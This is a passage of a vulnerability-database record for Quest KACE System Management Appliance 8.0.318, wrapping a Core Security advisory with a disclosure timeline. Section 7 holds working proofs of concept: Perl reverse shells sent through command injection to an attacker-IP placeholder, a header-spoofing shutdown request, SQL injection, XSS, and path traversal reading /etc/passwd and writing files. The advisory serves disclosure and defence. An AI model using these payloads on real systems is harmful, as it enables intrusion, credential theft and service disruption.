"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.307000",
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"date": "2018-06-28T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11133"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005408"
},
{
"date": "2018-06-28T17:20:33.277000",
"db": "NVD",
"id": "CVE-2018-11133"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15640"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1221"
}
],
"trust": 0.6
}
}
VAR-201805-0599
Vulnerability from variot - Updated: 2023-12-18 12:01 The '/common/ajax_email_connection_test.php' script in the Quest KACE System Management Appliance 8.0.318 is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via the POST method. Quest KACE Systems Management Appliance contains a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Quest KACE System Management Appliance provides comprehensive system management for all network-connected devices. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318)
Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.10, 7.11).
7.1. (The section title was not preserved in this copy; the affected script is '/common/download_agent_installer.php', as shown in the request below.)
The script receives the following parameters via the GET method:
. platform: Indicates the platform on which the agent is going to be installed
. serv: SHA256 hash of a fixed value that depends on each appliance
. orgid: Organization ID
. version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/-----
- platform = windows
- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
- orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};';
- version = 8.0.152 (last agent version available for windows)
-----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3.
To exploit this issue, the 'ERROR_MESSAGES' parameter must be an array that meets some specific conditions.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that require higher privileges, the application relies on a message queue manager that runs with root privileges and only allows a fixed set of commands.
One of the available commands allows changing any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] The 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are meant to be accessible only from localhost. This restriction is enforced using the client-controlled 'Host' and 'X-Forwarded-For' HTTP headers, so it can be bypassed by supplying values such as 'Host: localhost' and 'X-Forwarded-For: ::1', as in the request below.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="CSRF_TOKEN"

-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="$shutdown"

DoIt!
Content-Disposition: form-data; name="save"

Save
-----------------------------5642543667001619951434940129--
-----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgid' parameter received by the '/common/download_agent_installer.php' script is not sanitized before being used in a SQL query, leading to SQL injection; specifically, a blind, time-based injection.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
[CVE-2018-11140] The 'reportId' parameter received by the '/common/run_report.php' script is not sanitized before being used in a SQL query, leading to SQL injection; specifically, an error-based injection.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross-Site Scripting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to reflected cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
(The cross-site scripting request from section 7.9 was duplicated here in the original text; it does not apply to this issue.)
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'TestContent' (sent base64-encoded as 'VGVzdENvbnRlbnQ='). Files can be written to any location where the 'www' user has write permissions.
File deletion could be abused to delete the '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence determines whether the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline
2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form.
2018-03-05: Quest Support confirmed the receipt and requested additional information.
2018-03-12: Core Security sent a draft advisory including a technical description.
2018-03-16: Quest Support asked for the CVE-IDs.
2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery.
2018-03-16: Quest Support thanked Core for its reply and stated it would be in touch during the process.
2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one.
2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information.
2018-03-21: Core replied with the affected version (which was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories.
2018-03-21: Quest Support acknowledged the information provided.
2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and detail provided. Quest specified it already had fixes in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM stated that the work done by Core is in breach of its license agreement, and requested that Core not distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow-up email and informed that it had made a hotfix to patch the reported vulnerabilities. Quest also requested a call to understand future opportunities based on Core's capabilities. Finally, Quest asked for information about the researchers who found the vulnerabilities and a link of Core's choosing to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements).
2018-04-16: Core answered the email from 2018-03-26, stating that the company is following standard practices with regard to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned that Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry-standard disclosure processes that involve publication of the vulnerabilities.
2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13).
2018-04-17: Core thanked Quest for the answer, stated its willingness to keep written communications between the parties in order to better document the process, and communicated the next steps of the process, including: 1. Testing the fix (if the vendor agrees), 2. Getting CVE-IDs, 3. Getting a vendor link to be included in the advisory, and finally 4. Sending the final advisory version to the vendor and coordinating a publication date together.
With regard to Quest's requests, Core provided the researchers' names and the URL the advisory will have when published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest), but that our intention is to keep that services request separate from the coordinated disclosure process.
2018-04-18: Quest Support informed that they had publicly made patches available for its customers and unilaterally closed the case.
2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity &amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0599",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10908"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005412"
},
{
"db": "NVD",
"id": "CVE-2018-11139"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1215"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11139"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11139",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
